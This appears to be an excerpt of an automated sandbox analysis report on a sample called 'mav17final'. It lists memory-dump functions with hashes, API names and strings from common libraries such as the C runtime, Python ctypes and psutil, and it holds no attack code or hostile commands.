                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 349153199-0
                                                  • Opcode ID: 94e1b7c85106b5dcadd5bf74e1c1f6267d6a35972fcb64925ed8eb6f2d0728e2
                                                  • Instruction ID: 5fe74c60f617d5eda3cb9ae1f8a19b61ba74d386347a82f466e7148d2b47d7f6
                                                  • Opcode Fuzzy Hash: 94e1b7c85106b5dcadd5bf74e1c1f6267d6a35972fcb64925ed8eb6f2d0728e2
                                                  • Instruction Fuzzy Hash: 4C819F61E086C386FE549F6D984527962F0AF85BC0F5A8135EB0D87792DE3CE84FA700
                                                  Function 00007FF8B98411D0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 349153199-0
                                                  • Opcode ID: 49741281be2100ec61cea02429068dcdc2aa4a812f9568a561c19d79723e8765
                                                  • Instruction ID: bb1acfe347a5400da4b368faf279c2cc31ca3e0a6a8d1223bb896ff57fc1456c
                                                  • Opcode Fuzzy Hash: 49741281be2100ec61cea02429068dcdc2aa4a812f9568a561c19d79723e8765
                                                  • Instruction Fuzzy Hash: 6481AF21F1C2D346FB56AF6E94422B96691AFA6BC0F44C139DB0D87796EF3CE8458700
                                                  Function 00007FF8B907A17C Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 349153199-0
                                                  • Opcode ID: e2e812cca47fa06c2962cce7b35db83f97c9664bcb2d84c7423b167603f58d87
                                                  • Instruction ID: 7156839ff6e43e907e95c0e924cd4f2b45186009b3178a2d91e2a96ad8062bb2
                                                  • Opcode Fuzzy Hash: e2e812cca47fa06c2962cce7b35db83f97c9664bcb2d84c7423b167603f58d87
                                                  • Instruction Fuzzy Hash: 6E81B061F0C6C386FE50AF6D98412B96AD0AFA57E0F568035EB0D83792DE3DE443A710
                                                  Function 00007FF8B9F6B680 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 142COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CallObjectObject_
                                                  • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                  • API String ID: 3040866976-3177377183
                                                  • Opcode ID: d8d30b96da88cef245048956aa11174a0505f3ed0a0a37e68dc2437735cc2005
                                                  • Instruction ID: e01b28c735a58274de375a1c395705bf7c6275bee9a61fcea60905846021a86d
                                                  • Opcode Fuzzy Hash: d8d30b96da88cef245048956aa11174a0505f3ed0a0a37e68dc2437735cc2005
                                                  • Instruction Fuzzy Hash: A0515765A0DB8281EE549F6EE9502792761BF85FE6F086032DF0D477A9DF2CE451C300
                                                  Function 00007FF8BA24A4E8 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                  • API String ID: 2943138195-1464470183
                                                  • Opcode ID: f2c82fd6e231fdf3051f437846c0782e2719a4821ee929760b6b2afc08469b6e
                                                  • Instruction ID: 2fd3c33f5123ca1f85c74b9302a53c9587e05871b61535ad416e647f30b07a77
                                                  • Opcode Fuzzy Hash: f2c82fd6e231fdf3051f437846c0782e2719a4821ee929760b6b2afc08469b6e
                                                  • Instruction Fuzzy Hash: 33515972E19A6789FB14CBAAE9801BC37B0BB14B84F5040B5DF0E57A98DF39E545E700
                                                  Function 00007FF8B9F616B4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Unicode_$ConcatDict_FromInternStringTuple_Update
                                                  • String ID: _be
                                                  • API String ID: 1858819020-4071763053
                                                  • Opcode ID: 10cbbb94ffeeef5047c8331b99db0bdcf7c3f3ec2fb3fe09a0319070b4712324
                                                  • Instruction ID: a65e44c0a0e3e9b7999e423665690a8b12b4c921876913b754bdc59c665fbcb8
                                                  • Opcode Fuzzy Hash: 10cbbb94ffeeef5047c8331b99db0bdcf7c3f3ec2fb3fe09a0319070b4712324
                                                  • Instruction Fuzzy Hash: 3F510372A09F8685EB948F29D85027877A4FB5AFE6B18A135CB4D07764DF3CE4A1C340
                                                  Function 00007FF8B9F6CE1C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F6C4D0: _PyObject_GC_NewVar.PYTHON311(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C4E7
                                                    • Part of subcall function 00007FF8B9F6C4D0: memset.VCRUNTIME140(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C534
                                                    • Part of subcall function 00007FF8B9F6C4D0: PyObject_GC_Track.PYTHON311(?,?,?,00007FF8B9F6CE4C,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6C53C
                                                  • PyErr_NoMemory.PYTHON311(?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6CE8C
                                                  • _Py_Dealloc.PYTHON311 ref: 00007FF8B9F6CFCD
                                                    • Part of subcall function 00007FF8B9F6F698: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B9F6CE69,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6F6AD
                                                    • Part of subcall function 00007FF8B9F6F698: VirtualAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF8B9F6CE69,?,?,?,?,?,00007FF8B9F66CC2), ref: 00007FF8B9F6F6ED
                                                  • ffi_prep_cif.LIBFFI-8 ref: 00007FF8B9F6CF4E
                                                  • PyErr_Format.PYTHON311 ref: 00007FF8B9F6CF6C
                                                  • ffi_prep_closure.LIBFFI-8 ref: 00007FF8B9F6CF86
                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6CFBE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Object_$AllocDeallocFormatInfoMemoryStringSystemTrackVirtualffi_prep_cifffi_prep_closurememset
                                                  • String ID: ffi_prep_cif failed with %d$ffi_prep_closure failed with %d$invalid result type for callback function
                                                  • API String ID: 262837356-3338905684
                                                  • Opcode ID: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
                                                  • Instruction ID: 6d739d25746800365fd4dc73f1821b0fa1215ec0bad5e935133a14a9a2aabcd8
                                                  • Opcode Fuzzy Hash: d5e79a3c8a6f2ae5980b289ff7b9deb079edb7f79e81270934b3751b0593511a
                                                  • Instruction Fuzzy Hash: D751F522A09B8285EB548F2AE84067927B0FF59BE6F151136DB8D47764CF3CE455C380
                                                  Function 00007FF8B9079260 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExtendedTable
                                                  • String ID: GetExtendedUdpTable failed$GetExtendedUdpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows/socks.c
                                                  • API String ID: 2407854163-2042687678
                                                  • Opcode ID: 35cfc747fd42142dea801a501df7b154b3cf10118a4a0f8d7693ba94d07b59d1
                                                  • Instruction ID: 9fabed5a8885933d4babcae50d84a9ff6ea2f932e124253122e7b426f108fc5a
                                                  • Opcode Fuzzy Hash: 35cfc747fd42142dea801a501df7b154b3cf10118a4a0f8d7693ba94d07b59d1
                                                  • Instruction Fuzzy Hash: 8B417C35B0868282EF549F2DF4442697BA1EF987E4F088036DB4D477A5DE7CE4868B00
                                                  Function 00007FF8B90790E0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExtendedTable
                                                  • String ID: GetExtendedTcpTable failed$GetExtendedTcpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows/socks.c
                                                  • API String ID: 2407854163-1918470230
                                                  • Opcode ID: ecf26bae23164060e8e4a53c33f2f163f6d16a6659fa752ae9be49c7f8d3077a
                                                  • Instruction ID: be2f8127d99b67ffdfd4e6a95993f37be125e1bba33a08a95d45ca8f853e999f
                                                  • Opcode Fuzzy Hash: ecf26bae23164060e8e4a53c33f2f163f6d16a6659fa752ae9be49c7f8d3077a
                                                  • Instruction Fuzzy Hash: 6F417D25B0868282EF549F2DF45426A7BA1EFA87E4F458036DB4D07765EE7CD486CB00
                                                  Function 00007FF8B9079E60 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CreateErrorEventLast
                                                  • String ID: CreateEventW$LoadUpdateEvent$PdhAddEnglishCounterW failed$PdhCollectQueryDataEx failed$PdhOpenQueryW failed$RegisterWaitForSingleObject$\System\Processor Queue Length
                                                  • API String ID: 545576003-2079054072
                                                  • Opcode ID: c1cb49d9b83db92669efa6220550d7b029c16e342428b40d385d0b0f49376f49
                                                  • Instruction ID: d3cc2e3b9f5cccb6a937bc621cbef0c2888b854e51b929a1835bb936d5e79e7f
                                                  • Opcode Fuzzy Hash: c1cb49d9b83db92669efa6220550d7b029c16e342428b40d385d0b0f49376f49
                                                  • Instruction Fuzzy Hash: 78312C61A09A86C2EF10DF69E8441BA6BA1FFA87E4F844036DB4D87664DF3CE546C710
                                                  Function 00007FF8B90771F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: fprintf
                                                  • String ID: %s -> ERROR_NOACCESS$(is)$ReadProcessMemory$assume access denied (originated from %s)$psutil-debug [%s:%d]> $psutil/arch/windows/process_info.c
                                                  • API String ID: 383729395-1572680409
                                                  • Opcode ID: eea2a8f4a4062310805da43e97e10fd5ad741b3a1c6c4589939d84234f0c8799
                                                  • Instruction ID: 11c87dcf40ecf28ee24a5928230ae60de0a4a6dd5a99d0a1f97cf0689d2c9a4d
                                                  • Opcode Fuzzy Hash: eea2a8f4a4062310805da43e97e10fd5ad741b3a1c6c4589939d84234f0c8799
                                                  • Instruction Fuzzy Hash: F9314361A0CAC681EE51DF29E8553B967A0FFB87E4F804036DB4D476A6DE2CE147C710
                                                  Function 00007FF8B9F6E0F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocObject_$Arg_AttrCallFromMethodParseTupleUnicode_Vectorcall
                                                  • String ID: OO!
                                                  • API String ID: 3012979734-3205451899
                                                  • Opcode ID: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
                                                  • Instruction ID: dbef322df1f981d4eba753f2f94b69ad5c6e0cb3e42a6662e9ae5ac5f91dd46a
                                                  • Opcode Fuzzy Hash: b86a9e6aec3d04f9dfe7387ee9b59cc105e28f1fb880d666b22fe7cdd29bfbaf
                                                  • Instruction Fuzzy Hash: DD213B32A09F8281EF448F29E8546786BA1EF4ABE2F186135DF4E47754EE3CE454D300
                                                  Function 00007FF8B9078530 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 58serviceCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                  • String ID: (originated from %s)$OpenSCManager$OpenService
                                                  • API String ID: 48634454-532727491
                                                  • Opcode ID: 84ab02473cebbfb869f4af948c1478c6e0cf08796c8f590fd933fbdfc8e87945
                                                  • Instruction ID: 684d4ca7334128e047bc342b59f524297aae0304f01fbd58c9ec177534c366e5
                                                  • Opcode Fuzzy Hash: 84ab02473cebbfb869f4af948c1478c6e0cf08796c8f590fd933fbdfc8e87945
                                                  • Instruction Fuzzy Hash: 9C216D51B1CACA82EE109F39A8543B92BA1BF6CBE4F804031DF0E46355EE2CE50B8740
                                                  Function 00007FF8B9F6E224 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Err_Mem_$AllocCharFormatUnicode_Wide
                                                  • String ID: String too long for BSTR$unicode string expected instead of %s instance
                                                  • API String ID: 920172908-178309214
                                                  • Opcode ID: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
                                                  • Instruction ID: 3a0f8d5be9824b40b090db43e7e6325a78c14466f3751200f6b8654805ce30ec
                                                  • Opcode Fuzzy Hash: cf6aaef1cfa7e26ad3eb861eb924d9a3e9377ee2f3586ae237e535f2c803a6dc
                                                  • Instruction Fuzzy Hash: C8210966E09F8281EE948F59E8541796B62FF8AFE2F185035DB0E53724DE3CE4A5C300
                                                  Function 00007FF8B9F6A080 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$DeallocString$Formatmemcpy
                                                  • String ID: byte string too long$bytes expected instead of %s instance$can't delete attribute
                                                  • API String ID: 1948958528-1866040848
                                                  • Opcode ID: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
                                                  • Instruction ID: 89be5c62ea4a14b76890ce3b39e7294a647934fb5219e7566d075047ebcc897b
                                                  • Opcode Fuzzy Hash: fa96def4341ef930101010d25cc26409db7019c647d688fb077c539500109b12
                                                  • Instruction Fuzzy Hash: 88212A62A08F8281EB508F2EE9401792760FF46BE6F14A132CB0E47765CF2DE485C301
                                                  Function 00007FF8BA248BA4 Relevance: 15.2, APIs: 10, Instructions: 150COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID:
                                                  • API String ID: 2943138195-0
                                                  • Opcode ID: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
                                                  • Instruction ID: 6508fb74490612c4b62403dc10b5103dff495ddbcc7b8733762f465a371da95f
                                                  • Opcode Fuzzy Hash: ea53d01b8add9f065da6da89440d1b5514e5cb284af6834d09ce1e9fb4639f71
                                                  • Instruction Fuzzy Hash: 0D613762F29B6298FB00DBA8D8801EC37B1BB04B88F444476DF1D6BA99DF78E545D340
                                                  Function 00007FF8B90C3360 Relevance: 15.1, APIs: 10, Instructions: 146COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Mem_memmove$Bytes_DeallocFromMallocReallocSizeString
                                                  • String ID:
                                                  • API String ID: 1285943476-0
                                                  • Opcode ID: b1532046c9828cc468a7a84711bf2d79d67f1a2fff2fc6f6c5e67236e34e6897
                                                  • Instruction ID: 1c668fd5194f6456db4bf3595150f097842decb5724e3e583f5ffc1294ab75ff
                                                  • Opcode Fuzzy Hash: b1532046c9828cc468a7a84711bf2d79d67f1a2fff2fc6f6c5e67236e34e6897
                                                  • Instruction Fuzzy Hash: BE513422A19B8292EE558F2AA44423963B8FF44FC4F188435DF4D5BB68DF3CE45B9310
                                                  Function 00007FF8BA2433E0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File
